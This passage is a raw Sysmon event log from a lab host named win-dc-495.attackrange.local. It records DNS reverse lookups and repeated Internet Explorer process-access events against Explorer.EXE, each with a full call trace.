22542200x800000000000000013608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.613{59A5CD1D-8E56-6005-2E00-00000000A301}2464196.194.57.52.in-addr.arpa.0type: 12 ec2-52-57-194-196.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000013607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.611{59A5CD1D-8E56-6005-2E00-00000000A301}2464135.31.126.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.611{59A5CD1D-8E56-6005-2E00-00000000A301}246435.208.58.216.in-addr.arpa.0type: 12 fra15s12-in-f3.1e100.net;type: 12 fra15s12-in-f35.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.611{59A5CD1D-8E56-6005-2E00-00000000A301}2464164.16.217.172.in-addr.arpa.0type: 12 fra15s11-in-f4.1e100.net;type: 12 fra15s11-in-f164.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000013632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64